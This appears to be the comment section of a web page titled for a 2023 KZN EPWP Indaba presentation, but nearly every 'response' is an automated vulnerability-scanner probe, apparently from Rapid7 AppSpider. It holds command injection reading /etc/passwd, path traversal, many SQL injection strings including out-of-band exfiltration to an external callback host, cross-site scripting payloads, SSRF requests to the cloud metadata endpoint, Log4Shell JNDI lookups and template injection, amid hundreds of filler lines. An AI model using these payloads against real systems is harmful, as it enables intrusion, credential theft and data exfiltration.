KZN EPWP 6th Annual Indaba 2023 Bheki Khawula Reporting on EPWP projects

3,647 Responses

1. comment

2. comment

3. comment

4. commentx789b3gm

5. x79pkfqu'”x79pkfqu

6. comment

7. comment

8. comment

9. comment

10. comment

11. comment

12. comment

13. comment

14. comment

15. comment

16. comment

17. comment

18. comment

19. ‘comment

20. comment’

21. comment”

22. comment’

23. comment

24. comment$0

25. comment;/etc/passwd

26. comment|/bin/cat /etc/passwd

27. comment|/bin/cat /etc/passwd|

28. comment;/etc/hosts

29. comment|/bin/cat /etc/hosts

30. comment|/bin/cat /etc/hosts|

31. comment;/usr/bin/id

32. comment|/bin/cat /usr/bin/id

33. comment|/bin/cat /usr/bin/id|

34. type c:\boot.ini

35. comment&dir

36. comment&ipconfig

37. echo foobar x7i5j8j0

38. comment&& echo foobar x7js99va

39. comment| echo foobar x7kdvxq0

40. comment| echo foobar x7ky32p0|

41. comment< echo foobar x7lpyhg9

42. netstat -na

43. comment&&netstat -na

44. comment|netstat -na

45. comment|netstat -na|

46. comment;netstat ;

47. comment<netstat -na

48. ping -h

49. comment

50. comment|ping -h|

51. comment<ping -h

52. $LANG

53. comment

54. comment<$LANG

55. ;TIMEOUT /T 10 /NOBREAK;

56. comment

57. ${applicationScope}

58. comment

59. comment

60. /etc/passwd

61. \WINDOWS\system32\drivers\etc\hosts

62. C:\WINDOWS\system32\drivers\etc\hosts

63. ..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts

64. ..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm

65. wp-comments-post.php

66. /wp-comments-post.php

67. ../../../../../../../../../../etc/hosts

68. < /etc/passwd

69. /.

70. \.

71. c:\.

72. http://appspidered.rapid7.com/

73. http://appspidered.rapid7.com/

74. appspidered.rapid7.com/

75. wp-comments-post.php.

76. ../wp-comments-post.php.

77. ../../wp-comments-post.php.

78. c:\boot.ini.

79. c:\boot.ini

80. d:\boot.ini

81. ../../../../../../boot.ini.

82. ../../../../../../boot.ini

83. noexistnoexist.

84. ../../../../../../../../../../etc/hosts.

85. /..

86. \..

87. c:\..

88. /../../../../../../../../../../..

89. /etc/passwd

90. file:/etc/passwd

91. file:/wp-comments-post.php

92. /WEB-INF/web.xml

93. WEB-INF/web.xml

94. file:WEB-INF/web.xml

95. /../../WEB-INF/web.xml

96. \WEB-INF\web.xml

97. /../../../../../../../../../../.

98. noexistnoexist

99. /.

100. /.

101. http://localhost/

102. http://localhost:22/

103. package.json.bak

104. package.json.bak

105. package.json.bak%00

106. ../wp-config.php

107. http://appspidered.rapid7.com/rfi/x7n845zb

108. comment

109. /../../../../../../../../../../vendor.js

110. ../../../../../

111. ..\..\..\..\..\

117. commentcommentcomment

118. 655321

119. ./*][

120. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

121. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

122. ‘comment

123. comment’

124. comment”

125. comment’

126. comment%’

127. comment

128. comment%u0027

129. comment%27

130. comment”

131. comment%”

132. comment

133. comment%u0022

134. comment%22

135. < /etc/passwd

136. a
     b

137. 1e309

138. char(0x27)char(0x27)comment

139. comment

140. comment

141. comment

142. comment

143. %u2018comment

144. %u2019comment

145. comment

146. comment

147. %u201acomment

148. %u201bcomment

149. %u201ccomment

150. %u201dcomment

151. %u201ecomment

152. — comment

153. /*comment

154. commentʼ

155. {comment

156. {‘comment

157. {“comment

158. {comment

159. {‘comment

160. {“comment

161. comment{

162. comment’}

163. comment”}

164. comment}

165. comment’}

166. comment”}

167. comment/

168. comment/’

169. comment/”

170. comment/

171. /’comment

172. comment/”

173. comment”}, {x7uhaydv:{$meta: “textScore

174. comment’}, {x7uz06z9:{$meta: ‘textScore

175. comment”}}, {x7vh4yja:{$meta: “textScore

176. comment’}, {x7v0u65a:{$meta: ‘textScore

177. x7wmps60

178. x7w7xx5i

179. x7xrw4x2: x7xrw4x2

180. comment

181. comment” && sleep(00) && “1”!=”1

182. comment” && sleep(10000) && “1”!=”1

183. comment” && “1”==”0

184. comment” && “1”==”1

185. comment’ && ‘1’==’0

186. comment’ && ‘1’==’1

187. comment’;+exec+master..xp_dirtree+”//e58bec6046c93a70786719ea46d92280b8a79a67.oob.appspidered.rapid7.com/a”–

188. comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’ae982ee5735c8994ab6f3078a23e1e9714c3c72b.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–

189. comment’;+SELECT+LOAD_FILE(‘\\\\31e2f11be8166312814c8b3e5aa329a4da0e386e.oob.appspidered.rapid7.com\\a’)#

190. comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\e201ac12b4fa9b1dde5df9537a2b500b389b66ae.oob.appspidered.rapid7.com\\a’#

191. comment’;+copy+(SELECT+”)+to+program+’nslookup+6dc189b55ff2cb415696ff48851ad21f305e9714.oob.appspidered.rapid7.com’–

192. comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://74b370196b6876d1b092cd4091159c779325564e.oob.appspidered.rapid7.com/’)+END)–

193. http://appspidered.rapid7.com/xss/script/5e18cbd4a813299872a57727cba3e7fa5307b83d

194. http://appspidered.rapid7.com/xss/script/c811e4f1e60ed7dd04583e633462c06fd32615d1

195. http://appspidered.rapid7.com/xss/script/075c10eed5f901e7e1e736c42bf113a5c08478b0

196. http://appspidered.rapid7.com/xss/script/27d08523a8228a559c8b28ce09a7cc02c22f33a7

197. https://appspidered.rapid7.com/xss/script/96df4ee2fffbc3214d9a816707cc049599b774ce

198. https://appspidered.rapid7.com/xss/script/e10a1da549666c09b836fe51d3893ceb54d8133c

199. https://appspidered.rapid7.com/xss/script/30392638fc91e264c30f90704d9da0146ebefdfb

200. https://appspidered.rapid7.com/xss/script/22cd59a2fdfa9e2628f575efa6bb261a3f374bbc

201. http://appspidered.rapid7.com/xss/script/8a735931314ef9e6a375850a634196504ff905e2

202. http://appspidered.rapid7.com/xss/script/aca72aa8950afa5d0e673d3d73b84da1a1a2bc00

203. http://appspidered.rapid7.com/xss/script/4f3ba2f880745b697bd718613f6a976ba388c537

204. http://appspidered.rapid7.com/xss/script/4e6dd461b87eda23a075b22c4340907b9acea67f

205. https://appspidered.rapid7.com/xss/script/4f4dec209d048f29c6b922535a9c9e0c7434b138

206. https://appspidered.rapid7.com/xss/script/2ca43d51ff4a79a3581df0e301f1d0b741120bc3

207. https://appspidered.rapid7.com/xss/script/2232b0fa932403f3c8dd3c2353cb174f63020b3b

208. https://appspidered.rapid7.com/xss/script/70819852071828a4cc4e0128de72d6fef190152d

209. appspidered.rapid7.com/xss/script/60d286a52f26c6dae1b6887497e9749d4fd6b9ae

210. appspidered.rapid7.com/xss/script/f3750bf2e12359b0678a314d320e2e20cca2d58a

211. appspidered.rapid7.com/xss/script/26ba9d205e895befa05972d5b5a159fe41e48644

212. appspidered.rapid7.com/xss/script/6563ef79fedb6cbcd9696f61383007b8cd999589

213. alert(2938571)

214. alert(3077872)

215. alert(3327803)

216. alert(3454811)

217. “>alert(3590021)

218. “>alert(3758000)

219. “>alert(3889100)

220. “>alert(4020199)

221. ‘>alert(4151302)

222. ‘>alert(4278316)

223. ‘>alert(4421717)

224. ‘>alert(4573304)

225. “>

226. “>

227. “>

228. “>

229. ‘>

230. ‘>

231. ‘>

232. ‘>

233. {constructor.constructor(6482563)}

234. {constructor.constructor(6650535)}

235. {constructor.constructor(6818514)}

236. {constructor.constructor(6994683)}

237. ‘comment

238. comment’

239. comment”

240. comment’

241. comment%’

242. comment

243. comment%u0027

244. comment%27

245. comment%”

246. comment

247. comment%u0022

248. comment%22

249. LIMIT a

250. 1e309

251. char(0x27)char(0x27)comment

252. %u2018comment

253. %u2019comment

254. %u201acomment

255. %u201bcomment

256. %u201ccomment

257. %u201dcomment

258. %u201ecomment

259. — comment

260. /*comment

261. commentʼ

262. comment’ UNION ALL select NULL —

263. comment” UNION ALL select NULL —

264. SELECT * FROM “master”

265. SELECC * FROM “ds”

266. *

267. |

268. comment|

269. &

270. comment&

271. comment)

272. !comment

273. http://appspidered.rapid7.com/

274. http://169.254.169.254/latest/meta-data/

275. http://169.254.169.254/latest/meta-data/ami-id

276. http://169.254.169.254/latest/meta-data/reservation-id

277. http://169.254.169.254/latest/meta-data/hostname

278. http://169.254.169.254/latest/meta-data/network/interfaces/macs/

279. http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

280. http://169.254.169.254/latest/dynamic/instance-identity/document

281. http://169.254.169.254/metadata/instance/compute?api-version=2019-08-15

282. http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0?api-version=2019-08-15

283. http://169.254.169.254/metadata/instance/network/interface/0?api-version=2019-08-15

284. ‘.phpinfo().’

285. http://www.example.com/

286. https://example.com/

287. ftp://example.com/

288. http://example.com/

289. gopher://example.com/

290. example.com/

291. .example.com/

292. https://example.com/comment

293. ${jndi:ldap://16de4246f1733be90fa76543f09e928ae3584950.oob.appspidered.rapid7.${lower:COM}}

294. x71iudy2<x71iudy2

295. x715xx62’x715xx62

296. x72panv9″x72panv9

297. x729wbrp>x729wbrp

298. x73tvijy

299. =alert(16688209)

300. =alert(54397)

301. =alert(189608)

302. =alert(345290)

303. ‘alert(476388)

304. ‘alert(611591)

305. ‘alert(828737)

306. ‘alert(1021330)

307. abc

308. abc

309. abc

310. abc

311. abc

312. abc

313. abc

314. abc

319. comment”>

320. comment”>

321. comment”>

322. comment”>

323. abc

324. abc

325. abc

326. abc

331. @import’x7phmclq’;

332. @import’x7p170g5′;

333. @import’x7qmtocb’;

334. @import’x7q7fb7q’;

335. ADw-script AD4-alert(5380638) ADw-/script AD4-

336. ADw-script AD4-alert(5511736) ADw-/script AD4-

337. +ADw-script+AD4-alert(5655128)+ADw-/script+AD4-

338. +ADw-script+AD4-alert(5786234)+ADw-/script+AD4-

339. abc

340. abc

341. abc

342. abc

347. comment’>

348. comment’>

349. comment’>

350. comment’>

351. alert`7593064`

352. alert`7761048`

353. alert`7900349`

354. alert`8035556`

355. prompt`8203540`

356. prompt`8338765`

357. prompt`8473991`

358. prompt`8617386`

359. top[‘al’ ‘ert’](8748490)

360. top[‘al’ ‘ert’](8875498)

361. top[‘al’+’ert’](9014801)

362. top[‘al’+’ert’](9158199)

363. aler\u0074(9305680);

364. aler\u0074(9436778);

365. aler\u0074(9604758);

366. aler\u0074(9862890);

367. MOUSEOVER ME

368. MOUSEOVER ME

369. MOUSEOVER ME

370. MOUSEOVER ME

371. c

372. c

373. c

374. c

375. \”http://example.com/ ‘ onmouseover=alert(11317486) ‘

376. \”http://example.com/ ‘ onmouseover=alert(11489581) ‘

377. \”http://example.com/ ‘ onmouseover=alert(11616596) ‘

378. \”http://example.com/ ‘ onmouseover=alert(11743613) ‘

379. alert(11911612)

380. alert(12190255)

381. alert(12354144)

382. alert(12493455)

383. “><img src=x onerror="alert(12636858)

384. “><img src=x onerror="alert(12845816)

385. “><img src=x onerror="alert(13050663)

386. “><img src=x onerror="alert(13218637)

387. comment’ AND ‘1’=’0

388. comment’ AND ‘1’=’1

389. comment” AND “1”=”0

390. comment” AND “1”=”1

391. comment’ AND 1=0/*

392. comment’ AND 1=1/*

393. comment’ AND 1=0)/*

394. comment’ AND 1=1)/*

395. comment’ AND 1=0–

396. comment’ AND 1=1–

397. comment’ AND 1=0)–

398. comment’ AND 1=1)–

399. comment’) AND (‘1’=’0

400. comment’) AND (‘1’=’1

401. comment”) AND (“1″”=”0

402. comment”) AND (“1″”=”1

403. comment’ AND 1=0 LIMIT 1–

404. comment’ AND 1=1 LIMIT 1–

405. REPEAT(0x636f6d6d656e74,2)

406. REPEAT(0x636f6d6d656e74,1)

407. comment OR 1=1

408. comment OR 1=0

409. comment’ OR ‘1’=’1

410. comment’ OR ‘1’=’0

411. comment” OR “1”=”1

412. comment” OR “1”=”0

413. comment’) OR (‘1’=’1

414. comment’) OR (‘1’=’0

415. comment”) OR (“1″=”1

416. comment”) OR (“1″=”0

417. comment’ OR 1=1 ##

418. comment’ OR 1=0 ##

419. comment’ OR 1=1 —

420. comment’ OR 1=0 —

421. comment’ OR ‘1’=’0

422. comment’ OR ‘1’=’1

423. comment” OR “1”=”0

424. comment” OR “1”=”1

425. comment’) OR (‘1’=’0

426. comment’) OR (‘1’=’1

427. comment”) OR (“1″=”0

428. comment”) OR (“1″=”1

429. comment’ OR 1=0 ##

430. comment’ OR 1=1 ##

431. comment’ OR 1=0 —

432. comment’ OR 1=1 —

433. comment’) AND ‘1’ in (‘0

434. comment’) AND ‘1’ in (‘1

435. comment”) AND “1” in (“0

436. comment”) AND “1” in (“1

437. comment’) OR ‘1’ in (‘0

438. comment’) OR ‘1’ in (‘1

439. comment”) OR “1” in (“0

440. comment”) OR “1” in (“1

441. comment DESC

442. comment ASC

443. 1, comment DESC

444. 1, comment ASC

445. comment

446. comment

447. comment

448. comment

449. comment

450. comment

451. comment

452. comment

453. comment

454. comment

455. comment

456. comment

457. comment

458. comment

459. comment

460. comment

461. comment

462. comment

463. comment

464. comment

465. comment

466. comment

467. comment

468. comment

469. comment

470. comment

471. comment

472. comment

473. comment

474. comment

475. comment

476. comment

477. comment

478. comment

479. comment

480. comment

481. comment

482. comment

483. comment

484. comment

485. comment

486. comment

487. comment

488. comment

489. comment

490. comment

491. comment

492. comment

493. comment

494. comment

495. comment

496. comment

497. comment

498. comment

499. comment

500. comment

501. comment

502. comment

503. comment

504. comment

505. comment

506. comment

507. comment

508. comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

509. comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

510. comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

511. comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

512. comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

513. comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —

514. comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

515. comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

516. comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

517. comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

518. comment’ and 1 in (select BENCHMARK(141297,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

519. comment’ and 1 in (select BENCHMARK(59687,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

520. comment’ and 1 in (select BENCHMARK(65655,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

521. comment’ and 1 in (select BENCHMARK(52715,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

522. comment’ and 1 in (select BENCHMARK(38786,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —

523. comment’ and 1 in (select*from(select(sleep(00)))a) —

524. comment’ and 1 in (select*from(select(sleep(05)))a) —

525. ‘ (select*from(select(sleep(00)))a) ‘

526. ‘ (select*from(select(sleep(05)))a) ‘

527. comment’);WAITFOR DELAY ’00:00:00′–

528. comment’);WAITFOR DELAY ’00:00:05′–

529. comment’ OR 1=1 ##

530. comment’ OR 1=0 ##

531. comment’ OR 1=1 —

532. comment’ OR 1=0 —

533. comment

534. comment AND pg_sleep(00) is not null

535. comment AND pg_sleep(05) is not null

536. comment ‘;select pg_sleep(00);– –

537. comment ‘;select pg_sleep(05);– –

538. comment ;select pg_sleep(00);– –

539. comment ;select pg_sleep(05);– –

540. {{ 58719 * 21973 }}

541. {{ 62951705 + 74179523 }}

542. comment

543. comment

544. comment

545. comment

546. comment

547. comment

548. comment

549. comment

550. comment

551. comment

552. comment

553. comment

554. comment

555. comment

556. comment

557. comment

558. comment

559. comment

560. comment

561. comment

562. comment

563. comment

564. comment

565. comment

566. comment

567. comment

568. comment

569. comment

570. comment

571. comment

572. comment

573. comment

574. comment

575. comment

576. comment

577. comment

578. comment

579. comment

580. comment

581. comment

582. comment

583. comment

584. comment

585. comment

586. comment

587. comment

588. comment

589. comment

590. comment

591. comment

592. comment

593. comment

594. comment

595. comment

596. comment

597. comment

598. comment

599. comment

600. comment

601. comment

602. comment

603. comment

604. comment

605. comment

606. comment

607. comment

608. comment

609. comment

610. comment

611. comment

612. comment

613. comment

614. comment

615. comment

616. comment

617. comment

618. comment

619. comment

620. comment

621. comment

622. comment

623. comment

624. comment

625. comment

626. comment

627. comment

628. comment

629. comment

630. comment

631. comment

632. comment

633. comment

634. comment

635. comment

636. comment

637. comment

638. comment

639. comment

640. comment

641. comment

642. comment

643. comment

644. comment

645. comment

646. comment

647. comment

648. comment

649. comment

650. comment

651. comment

652. comment

653. comment

654. comment

655. comment

656. comment

657. comment

658. comment

659. comment

660. comment

661. comment

662. comment

663. comment

664. comment

665. comment

666. comment

667. comment

668. comment

669. comment

670. comment

671. comment

672. comment

673. comment

674. comment

675. comment

676. comment

677. comment

678. comment

679. comment

680. comment

681. comment

682. comment

683. comment

684. comment

685. comment

686. comment

687. comment

688. comment

689. comment

690. comment

691. comment

692. comment

693. comment

694. comment

695. comment

696. comment

697. comment

698. comment

699. comment

700. comment

701. comment

702. comment

703. comment

704. comment

705. comment

706. comment

707. comment

708. comment

709. comment

710. comment

711. comment

712. comment

713. comment

714. comment

715. comment

716. comment

717. comment

718. comment

719. comment

720. comment

721. comment

722. comment

723. comment

724. comment

725. comment

726. comment

727. comment

728. comment

729. comment

730. comment

731. comment

732. comment

733. comment

734. comment

735. comment

736. comment

737. comment

738. comment

739. comment

740. comment

741. comment

742. comment

743. comment

744. comment

745. comment

746. comment

747. comment

748. comment

749. comment

750. comment

751. comment

752. comment

753. comment

754. comment

755. comment

756. comment

757. comment

758. comment

759. comment

760. comment

761. comment

762. comment

763. comment

764. comment

765. comment

766. comment

767. comment

768. comment

769. comment

770. comment

771. comment

772. comment

773. comment

774. comment

775. comment

776. comment

777. comment

778. comment

779. comment

780. comment

781. comment

782. comment

783. comment

784. comment

785. comment

786. comment

787. comment

788. comment

789. comment

790. comment

791. comment

792. comment

793. comment

794. comment

795. comment

796. comment

797. comment

798. comment

799. comment

800. comment

801. comment

802. comment

803. comment

804. comment

805. comment

806. comment

807. comment

808. comment

809. comment

810. comment

811. comment

812. comment

813. comment

814. comment

815. comment

816. comment

817. comment

818. comment

819. comment

820. comment

821. comment

822. comment

823. comment

824. comment

825. comment

826. comment

827. comment

828. comment

829. comment

830. comment

831. comment

832. comment

833. comment

834. comment

835. comment

836. comment

837. comment

838. comment

839. comment

840. comment

841. comment

842. comment

843. comment

844. comment

845. comment

846. comment

847. comment

848. comment

849. comment

850. comment

851. comment

852. comment

853. comment

854. comment

855. comment

856. comment

857. comment

858. comment

859. comment

860. comment

861. comment

862. comment

863. comment

864. comment

865. comment

866. comment

867. comment

868. comment

869. comment

870. comment

871. comment

872. comment

873. comment

874. comment

875. comment

876. comment

877. comment

878. comment

879. comment

880. comment

881. comment

882. comment

883. comment

884. comment

885. comment

886. comment

887. comment

888. comment

889. comment

890. comment

891. comment

892. comment

893. comment

894. comment

895. comment

896. comment

897. comment

898. comment

899. comment

900. comment

901. comment

902. comment

903. comment

904. comment

905. comment

906. comment

907. comment

908. comment

909. comment

910. comment

911. comment

912. comment

913. comment

914. comment

915. comment

916. comment

917. comment

918. comment

919. comment

920. comment

921. comment

922. comment

923. comment

924. comment

925. comment

926. comment

927. comment

928. comment

929. comment

930. comment

931. comment

932. comment

933. comment

934. comment

935. comment

936. comment

937. comment

938. comment

939. comment

940. comment

941. comment

942. comment

943. comment

944. comment

945. comment

946. comment

947. comment

948. comment

949. comment

950. comment

951. comment

952. comment

953. comment

954. comment

955. comment

956. comment

957. comment

958. comment

959. comment

960. comment

961. comment

962. comment

963. comment

964. comment

965. comment

966. comment

967. comment

968. comment

969. comment

970. comment

971. comment

972. comment

973. comment

974. comment

975. comment

976. comment

977. comment

978. comment

979. comment

980. comment

981. comment

982. comment

983. comment

984. comment

985. comment

986. comment

987. comment

988. comment

989. comment

990. comment

991. comment

992. comment

993. comment

994. comment

995. comment

996. comment

997. comment

998. comment

999. comment

1000. comment

1001. comment

1002. comment

1003. comment

1004. comment

1005. comment

1006. comment

1007. comment

1008. comment

1009. comment

1010. comment

1011. comment

1012. comment

1013. comment

1014. comment

1015. comment

1016. comment

1017. comment

1018. comment

1019. comment

1020. comment

1021. comment

1022. comment

1023. comment

1024. comment

1025. comment

1026. comment

1027. comment

1028. comment

1029. comment

1030. comment

1031. comment

1032. comment

1033. comment

1034. comment

1035. comment

1036. comment

1037. comment

1038. comment

1039. comment

1040. comment

1041. comment

1042. comment

1043. comment

1044. comment

1045. comment

1046. comment

1047. comment

1048. comment

1049. comment

1050. comment

1051. comment

1052. comment

1053. comment

1054. comment

1055. comment

1056. comment

1057. comment

1058. comment

1059. comment

1060. comment

1061. comment

1062. comment

1063. comment

1064. comment

1065. comment

1066. comment

1067. comment

1068. comment

1069. comment

1070. comment

1071. comment

1072. comment

1073. comment

1074. comment

1075. comment

1076. comment

1077. comment

1078. comment

1079. comment

1080. comment

1081. comment

1082. comment

1083. comment

1084. comment

1085. comment

1086. comment

1087. comment

1088. comment

1089. comment

1090. comment

1091. comment

1092. comment

1093. comment

1094. comment

1095. comment

1096. comment

1097. comment

1098. comment

1099. comment

1100. comment

1101. comment

1102. comment

1103. comment

1104. comment

1105. comment

1106. comment

1107. comment

1108. comment

1109. comment

1110. comment

1111. comment

1112. comment

1113. comment

1114. comment

1115. comment

1116. comment

1117. comment

1118. comment

1119. comment

1120. comment

1121. comment

1122. comment

1123. comment

1124. comment

1125. comment

1126. comment

1127. comment

1128. comment

1129. comment

1130. comment

1131. comment

1132. comment

1133. comment

1134. comment

1135. comment

1136. comment

1137. comment

1138. comment

1139. comment

1140. comment

1141. comment

1142. comment

1143. comment

1144. comment

1145. comment

1146. comment

1147. comment

1148. comment

1149. comment

1150. comment

1151. comment

1152. comment

1153. comment

1154. comment

1155. comment

1156. comment

1157. comment

1158. comment

1159. comment

1160. comment

1161. comment

1162. comment

1163. comment

1164. comment

1165. comment

1166. comment

1167. comment

1168. comment

1169. comment

1170. comment

1171. comment

1172. comment

1173. comment

1174. comment

1175. comment

1176. comment

1177. comment

1178. comment

1179. comment

1180. comment

1181. comment

1182. comment

1183. comment

1184. comment

1185. comment

1186. comment

1187. comment

1188. comment

1189. comment

1190. comment

1191. comment

1192. comment

1193. comment

1194. comment

1195. comment

1196. comment

1197. comment

1198. comment

1199. comment

1200. comment

1201. comment

1202. comment

1203. comment

1204. comment

1205. comment

1206. comment

1207. comment

1208. comment

1209. comment

1210. comment

1211. comment

1212. comment

1213. comment

1214. comment

1215. comment

1216. comment

1217. comment

1218. comment

1219. comment

1220. comment

1221. comment

1222. comment

1223. comment

1224. comment

1225. comment

1226. comment

1227. comment

1228. comment

1229. comment

1230. comment

1231. comment

1232. comment

1233. comment

1234. comment

1235. comment

1236. comment

1237. comment

1238. comment

1239. comment

1240. comment

1241. comment

1242. comment

1243. comment

1244. comment

1245. comment

1246. comment

1247. comment

1248. comment

1249. comment

1250. comment

1251. comment

1252. comment

1253. comment

1254. comment

1255. comment

1256. comment

1257. comment

1258. comment

1259. comment

1260. comment

1261. comment

1262. comment

1263. comment

1264. comment

1265. comment

1266. comment

1267. comment

1268. comment

1269. comment

1270. comment

1271. comment

1272. comment

1273. comment

1274. comment

1275. comment

1276. comment

1277. comment

1278. comment

1279. comment

1280. comment

1281. comment

1282. comment

1283. comment

1284. comment

1285. comment

1286. comment

1287. comment

1288. comment

1289. comment

1290. comment

1291. comment

1292. comment

1293. comment

1294. comment

1295. comment

1296. comment

1297. comment

1298. comment

1299. comment

1300. comment

1301. comment

1302. comment

1303. comment

1304. comment

1305. comment

1306. comment

1307. comment

1308. comment

1309. comment

1310. comment

1311. comment

1312. comment

1313. comment

1314. comment

1315. comment

1316. comment

1317. comment

1318. comment

1319. comment

1320. comment

1321. comment

1322. comment

1323. comment

1324. comment

1325. comment

1326. comment

1327. comment

1328. comment

1329. comment

1330. comment

1331. comment

1332. comment

1333. comment

1334. comment

1335. comment

1336. comment

1337. comment

1338. comment

1339. comment

1340. comment

1341. comment

1342. comment

1343. comment

1344. comment

1345. comment

1346. comment

1347. comment

1348. comment

1349. comment

1350. comment

1351. comment

1352. comment

1353. comment

1354. comment

1355. comment

1356. comment

1357. comment

1358. comment

1359. comment

1360. comment

1361. comment

1362. comment

1363. comment

1364. comment

1365. comment

1366. comment

1367. comment

1368. comment

1369. comment

1370. commentx7mi4ahc

1371. x7mzy3tx'”x7mzy3tx

1372. comment

1373. comment

1374. comment

1375. comment

1376. comment

1377. comment

1378. comment

1379. comment

1380. comment

1381. comment

1382. comment

1383. comment

1384. comment

1385. comment

1386. comment

1387. comment

1388. ‘comment

1389. comment’

1390. comment”

1391. comment’

1392. comment

1393. x7sa0n7v

1394. x7ss4frl

1395. x7tey1ui: x7tey1ui

1396. ${jndi:ldap://b0fff1cc2156f3c9b8d6d030bb287eb88f506c09.oob.appspidered.rapid7.${lower:COM}}

1397. http://www.example.com/

1398. https://example.com/

1399. ftp://example.com/

1400. http://example.com/

1401. gopher://example.com/

1402. example.com/

1403. .example.com/

1404. https://example.com/comment

1405. ${applicationScope}

1406. ${requestScope}

1407. ${“asdflkj”.toString().replace(“d”,”x”)}

1408. #{“asdflkj”.toString().replace(“d”,”x”)}

1409. http://appspidered.rapid7.com/xss/script/ff8c4f5f7a37271c628655c6567038ce0468fa9a

1410. http://appspidered.rapid7.com/xss/script/bc4b0f69462eb63cd2de0b92e84c739a69d55107

1411. http://appspidered.rapid7.com/xss/script/e6aef4fa5e0874519e52d722ae2ac0b5558bc394

1412. http://appspidered.rapid7.com/xss/script/e05dbb4c4dea2ad621578320f5f028b903e68d00

1413. https://appspidered.rapid7.com/xss/script/ca8ee04b7275ec9e55cbddbb5b2291544f031847

1414. https://appspidered.rapid7.com/xss/script/e9cd8c927e3c8b2f6860a86ef6358f0da1b3e97b

1415. https://appspidered.rapid7.com/xss/script/4115d73caac014044893b996b5e8e440018701ce

1416. https://appspidered.rapid7.com/xss/script/d3e963a5705d401e7a3eda2e46bba3c323b8c9bd

1417. http://appspidered.rapid7.com/xss/script/13bbac97ec0a0cb4997d84b1251efed3167dd296

1418. http://appspidered.rapid7.com/xss/script/e69f9fb2a2d33685a852d9c4e10a4541ce84665e

1419. http://appspidered.rapid7.com/xss/script/03dc7db898b2be0db06f88e00cec76394943307b

1420. http://appspidered.rapid7.com/xss/script/4e1d4c31ff812438a7271edd5bec61ca4d3ad8dd

